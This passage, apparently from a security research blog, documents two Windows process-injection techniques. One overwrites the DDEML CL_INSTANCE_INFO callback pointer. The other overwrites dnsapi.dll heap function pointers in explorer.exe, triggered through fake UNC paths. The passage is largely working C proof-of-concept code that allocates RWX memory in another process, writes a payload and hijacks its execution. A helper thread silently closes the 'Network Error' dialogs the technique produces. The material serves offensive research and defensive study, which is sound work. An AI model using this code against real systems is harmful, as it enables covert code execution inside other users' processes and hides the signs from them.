    CONVCONTEXT cc;
    HCONVLIST   cl;
    DWORD       idInst = 0;
    HCONV       c = NULL;
    CONVINFO    ci;
    WCHAR       server[MAX_PATH];
    
    if(DMLERR_NO_ERROR != DdeInitialize(&idInst, NULL, APPCLASS_STANDARD, 0)) {
      printf("unable to initialize : %i.\n", GetLastError());
      return;
    }
    
    ZeroMemory(&cc, sizeof(cc));
    cc.cb = sizeof(cc);
    cl = DdeConnectList(idInst, 0, 0, 0, &cc);
    
    if(cl != NULL) {
      for(;;) {
        c = DdeQueryNextServer(cl, c);
        if(c == NULL) break;
        ci.cb = sizeof(ci);
        DdeQueryConvInfo(c, QID_SYNC, &ci);
        DdeQueryString(idInst, ci.hszSvcPartner, server, MAX_PATH, CP_WINUNICODE);
        
        printf("Service : %-10ws Process : %ws\n", 
          server, wnd2proc(ci.hwndPartner));
      }
      DdeDisconnectList(cl);
    } else {
      printf("DdeConnectList : %x\n", DdeGetLastError(idInst));
    }
    DdeUninitialize(idInst);
}

DDE Internals

Figure 1 shows the decompiled code where the servers are created.

Figure 1. DDE initialization in shell32.dll

user32!DdeInitializeW is where all the interesting stuff occurs. user32!InternalDdeInitialize will allocate memory on the heap for a structure called CL_INSTANCE_INFO which isn’t documented in the public SDK, but you can still find it online.

typedef struct tagCL_INSTANCE_INFO {
    struct tagCL_INSTANCE_INFO *next;
    HANDLE                      hInstServer;
    HANDLE                      hInstClient;
    DWORD                       MonitorFlags;
    HWND                        hwndMother;
    HWND                        hwndEvent;
    HWND                        hwndTimeout;
    DWORD                       afCmd;
    PFNCALLBACK                 pfnCallback;
    DWORD                       LastError;
    DWORD                       tid;
    LATOM                      *plaNameService;
    WORD                        cNameServiceAlloc;
    PSERVER_LOOKUP              aServerLookup;
    short                       cServerLookupAlloc;
    WORD                        ConvStartupState;
    WORD                        flags;              // IIF_ flags
    short                       cInDDEMLCallback;
    PLINK_COUNT                 pLinkCount;
} CL_INSTANCE_INFO, *PCL_INSTANCE_INFO;

The only field we’re interested in is pfnCallback. The steps to inject are:

  1. Find the DDE mother window by its registered class name “DDEMLMom”.
  2. Read the address of CL_INSTANCE_INFO using GetWindowLongPtr.
  3. Allocate RWX memory in remote process and write payload there.
  4. Overwrite the function pointer pfnCallback with the remote address of payload.
  5. Trigger execution over DDE.

Figure 2 shows the properties of the mother window. As you can see, index zero of the Window Bytes is set. This is the address of CL_INSTANCE_INFO.

Figure 2. Mother Window for DDE server.

Injection

The following is a PoC to demonstrate the method works. Full source can be found here.

VOID dde_inject(LPVOID payload, DWORD payloadSize) {
    HWND             hw;
    SIZE_T           rd, wr;
    LPVOID           ptr, cs;
    HANDLE           hp;
    CL_INSTANCE_INFO pcii;
    CONVCONTEXT      cc;
    HCONVLIST        cl;
    DWORD            pid, idInst = 0;
    
    // 1. find a DDEML window and read the address 
    //    of CL_INSTANCE_INFO
    hw = FindWindowEx(NULL, NULL, L"DDEMLMom", NULL);
    if(hw == NULL) return;
    ptr = (LPVOID)GetWindowLongPtr(hw, GWLP_INSTANCE_INFO);
    if(ptr == NULL) return;
      
    // 2. open the process and read CL_INSTANCE_INFO
    GetWindowThreadProcessId(hw, &pid);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if(hp == NULL) return;
    ReadProcessMemory(hp, ptr, &pcii, sizeof(pcii), &rd);
    
    // 3. allocate RWX memory and write payload there.
    //    update callback
    cs = VirtualAllocEx(hp, NULL, payloadSize, 
      MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    WriteProcessMemory(
      hp, (PBYTE)ptr + offsetof(CL_INSTANCE_INFO, pfnCallback), 
      &cs, sizeof(ULONG_PTR), &wr);
            
    // 4. trigger execution via DDE protocol
    DdeInitialize(&idInst, NULL, APPCLASS_STANDARD, 0);
    ZeroMemory(&cc, sizeof(cc));
    cc.cb = sizeof(cc);
    cl = DdeConnectList(idInst, 0, 0, 0, &cc);
    DdeDisconnectList(cl);
    DdeUninitialize(idInst);
    
    // 5. restore original pointer and cleanup
    WriteProcessMemory(
      hp, 
      (PBYTE)ptr + offsetof(CL_INSTANCE_INFO, pfnCallback), 
      &pcii.pfnCallback, sizeof(ULONG_PTR), &wr);
          
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Windows Process Injection: DNS Client API

Introduction

This is a quick response to Code Execution via surgical callback overwrites by Adam. He suggests overwriting DNS memory functions to facilitate process injection. This post will demonstrate how the injection works with explorer.exe. It was only tested on a 64-bit version of Windows 10, so your experience may be different from mine. Nevertheless, the method does work.

DNS Client API DLL

When first loaded into a process, dnsapi!Heap_Initialize will assign the address of functions in the .text segment to variables in the .data segment. Figure 1 shows disassembly of this while figure 2 shows the function pointers.

Figure 1. dnsapi!Heap_Initialize

Figure 2. Function pointers for dnsapi.dll

pDnsAllocFunction is assigned dnsapi!Dns_HeapAlloc while pDnsFreeFunction is assigned dnsapi!Dns_HeapFree. Every time a DnsQuery API is called, both of these functions are executed via the pointers.

DNS Caching Resolver Service

The service runs from inside dnsrslvr.dll and is loaded by a service host (svchost.exe) process. dnsrslvr!ResolverInitialize will assign the address of functions in the .text segment to variables in the .data segment. Figure 3 shows disassembly of this while figure 4 shows the function pointers.

Figure 3. dnsrslvr!ResolverInitialize

Figure 4. Function pointers for dnsrslvr.dll

pDnsAllocFunction is assigned dnsapi!DnsApiAlloc while pDnsFreeFunction is assigned dnsapi!DnsApiFree.

Finding Pointers

Load dnsapi.dll into the local process and obtain the virtual address of the .data segment. Search it for two adjacent pointers with addresses inside the .text segment. Once found, subtract the local base address of dnsapi.dll to obtain the relative virtual address (RVA), then add the base address of dnsapi.dll in the remote process. The following code from the PoC illustrates this.

LPVOID GetDnsApiAddr(DWORD pid) {
    LPVOID                m, rm, va = NULL;
    PIMAGE_DOS_HEADER     dos;
    PIMAGE_NT_HEADERS     nt;
    PIMAGE_SECTION_HEADER sh;
    DWORD                 i, cnt = 0;
    PULONG_PTR            ds = NULL;
    
    // does remote have dnsapi loaded?
    rm  = GetRemoteModuleHandle(pid, L"dnsapi.dll");
    if(rm == NULL) return NULL;
    
    // load local copy
    m   = LoadLibrary(L"dnsapi.dll");
    if(m == NULL) return NULL;
    dos = (PIMAGE_DOS_HEADER)m;  
    nt  = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);  
    sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
          nt->FileHeader.SizeOfOptionalHeader);
          
    // locate the .data segment, save VA and number of pointers
    // (only the first four bytes of the section name are compared)
    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      if(*(PDWORD)sh[i].Name == *(PDWORD)".data") {
        ds  = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
        cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
        break;
      }
    }
    // no .data segment found
    if(ds == NULL) return NULL;
    
    // for each pair of adjacent pointers
    // (i + 1 < cnt avoids unsigned underflow when cnt is zero)
    for(i=0; i + 1 < cnt; i++) {
      // if two pointers side by side are not to code, skip it
      if(!IsCodePtr((LPVOID)ds[i  ])) continue;
      if(!IsCodePtr((LPVOID)ds[i+1])) continue;
      // calculate VA in remote process
      va = ((PBYTE)&ds[i] - (PBYTE)m) + (PBYTE)rm;
      break;
    }
    return va;
}
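
The search and the address arithmetic can be separated from the Windows specifics. The following is a minimal portable sketch, assuming the .data segment has already been read into an array of pointer-sized values and that the bounds of the .text segment are known. The helpers in_range, find_adjacent_code_ptrs and rebase are hypothetical names for illustration and are not part of the PoC, which uses IsCodePtr instead of a range check.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: true if v lies inside the half-open range [lo, hi). */
static int in_range(uintptr_t v, uintptr_t lo, uintptr_t hi) {
    return v >= lo && v < hi;
}

/* Scan cnt pointer-sized slots for two adjacent values that both fall
   inside [text_lo, text_hi). Returns the index of the first slot of the
   pair, or -1 if no such pair exists. */
static ptrdiff_t find_adjacent_code_ptrs(const uintptr_t *slots, size_t cnt,
                                         uintptr_t text_lo, uintptr_t text_hi) {
    assert(slots != NULL || cnt == 0);
    for (size_t i = 0; i + 1 < cnt; i++) {
        if (in_range(slots[i], text_lo, text_hi) &&
            in_range(slots[i + 1], text_lo, text_hi))
            return (ptrdiff_t)i;
    }
    return -1;
}

/* Translate an address between two mappings of the same module:
   subtracting the local base yields the RVA, adding the other base
   yields the address in the other mapping. */
static uintptr_t rebase(uintptr_t local_va, uintptr_t local_base,
                        uintptr_t other_base) {
    return (local_va - local_base) + other_base;
}
```

For example, a slot found at 0x10002340 in a module loaded locally at 0x10000000 has an RVA of 0x2340, so in a mapping based at 0x20000000 it sits at 0x20002340.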

Injection

Overwriting either of the function pointers and invoking the DNS API to resolve a hostname allows us to control the flow of execution inside a remote process. Unless the DNS_QUERY_BYPASS_CACHE option is specified by a DNS API client, the DNS cache service may be used to resolve a hostname and that’s where it’s possible to control flow inside the service.

Executing In Explorer

Explorer is the easiest target for demonstrating this method of injection because we can force it to resolve hostnames via the IShellWindows interface. Microsoft already provides an example of how to do this in sample code.

Network Dialogs

Since we’re deliberately using a fake UNC path to force invocation of the DNS Client API, explorer will display errors similar to what’s shown in figure 5.

Figure 5. Pesky Network Error

To hide these, a thread is created with an endless loop to find and automatically close them. It’s a bit crude and there may be a more elegant way of closing these, but it works for the PoC.


// for any "Network Error", close the window
VOID SuppressErrors(LPVOID lpParameter) {
    HWND hw;
    
    for(;;) {
      hw = FindWindowEx(NULL, NULL, NULL, L"Network Error");
      if(hw != NULL) {
        PostMessage(hw, WM_CLOSE, 0, 0);
      }
      // yield between polls so the loop does not pin a CPU core
      Sleep(50);
    }
}

Proof of Concept

To demonstrate that the method of injection works, the following code outlines each step. For more details, view the full source here.

VOID dns_inject(LPVOID payload, DWORD payloadSize) {
    LPVOID dns, cs, ptr;
    DWORD  pid, cnt, tick, i, t;
    HANDLE hp, ht;
    SIZE_T wr;
    HWND   hw;
    WCHAR  unc[32]={L'\\', L'\\'}; // UNC path to invoke DNS api

    // 1. obtain process id for explorer
    //    and try read address of function pointers
    GetWindowThreadProcessId(GetShellWindow(), &pid); 
    ptr = GetDnsApiAddr(pid);
    
    // 2. create a thread to suppress network errors displayed
    ht = CreateThread(NULL, 0, 
      (LPTHREAD_START_ROUTINE)SuppressErrors, NULL, 0, NULL);
      
    // 3. if dns api not already loaded, try force 
    // explorer to load via fake UNC path
    if(ptr == NULL) {
      tick = GetTickCount();
      for(i=0; i<8; i++) {
        unc[2+i] = (tick % 26) + L'a';
        tick >>= 2;
      }
      ShellExecInExplorer(unc);
      ptr = GetDnsApiAddr(pid);
    }
    
    if(ptr != NULL) {
      // 4. open explorer, backup address of dns function.
      //    allocate RWX memory and write payload
      hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
      ReadProcessMemory(hp, ptr, &dns, sizeof(ULONG_PTR), &wr);
      cs = VirtualAllocEx(hp, NULL, payloadSize, 
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
      
      // 5. overwrite pointer to dns function
      //    generate fake UNC path and trigger execution
      WriteProcessMemory(hp, ptr, &cs, sizeof(ULONG_PTR), &wr);
      tick = GetTickCount();
      for(i=0; i<8; i++) {
        unc[2+i] = (tick % 26) + L'a';
        tick >>= 2;
      }
      ShellExecInExplorer(unc);
      
      // 6. restore dns function, release memory and close process
      WriteProcessMemory(hp, ptr, &dns, sizeof(ULONG_PTR), &wr);
      // MEM_RELEASE must be used on its own; combining it with MEM_DECOMMIT fails
      VirtualFreeEx(hp, cs, 0, MEM_RELEASE);
      CloseHandle(hp);
    }
    // 7. terminate thread and release its handle
    TerminateThread(ht, 0);
    CloseHandle(ht);
}
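
The loop that builds the fake UNC path appears twice in the function above and could be factored out. Below is a portable sketch of the same arithmetic using narrow characters; make_fake_unc is a hypothetical helper and the seed parameter stands in for the value returned by GetTickCount.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Write "\\" followed by n lowercase letters derived from seed into out.
   out must have room for n + 3 characters including the terminator. */
static void make_fake_unc(uint32_t seed, char *out, size_t n) {
    assert(out != NULL);
    out[0] = '\\';
    out[1] = '\\';
    for (size_t i = 0; i < n; i++) {
        out[2 + i] = (char)('a' + (seed % 26));
        seed >>= 2;   /* same step as the original loop */
    }
    out[2 + n] = '\0';
}
```

Since only two bits are shifted out per letter, neighbouring letters are correlated and a small seed quickly degenerates into a run of 'a'. A seed of 25 produces the host name zgbaaaaa, for instance. That is acceptable here because the name only needs to be unlikely to resolve, not unpredictable.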

Summary

Processes have thousands of function pointers which are executed in response to I/O from the system or a user interface. Automating a way to monitor access to these function pointers while simultaneously sending I/O from an external process would no doubt uncover many more methods similar to the one discussed here. Source PoC.
